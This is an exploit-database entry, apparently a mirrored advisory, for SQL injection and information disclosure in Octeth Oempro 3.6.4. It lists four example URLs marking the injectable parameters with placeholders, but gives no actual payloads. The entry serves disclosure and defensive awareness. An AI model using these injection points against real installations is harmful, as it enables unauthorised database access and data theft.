[] NeoSense
E X P L O I T S
title author type platform port cve id

Octeth Oempro 3.6.4 - SQL Injection / Information Disclosure

Author: Ignacio Garrido
type: webapps
platform: php
port: 
date_added: 2011-02-03 
date_updated: 2014-11-21 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/46135/info

Octeth Oempro is prone to multiple SQL-injection vulnerabilities and an information-disclosure vulnerability.

Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Octeth Oempro 3.6.4 is vulnerable; other versions may also be affected.

http://www.example.com/cli_bounce.php

http://www.example.com/link.php?URL=[ENC URL]&Name=&EncryptedMemberID=[ENCODED
SQLI]&CampaignID=9&CampaignStatisticsID=16&Demo=0&Email=[MAIL]

http://www.example.com/html_version.php?ECID=[SQL]

http://www.example.com/archive.php?ArchiveID=[SQL]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.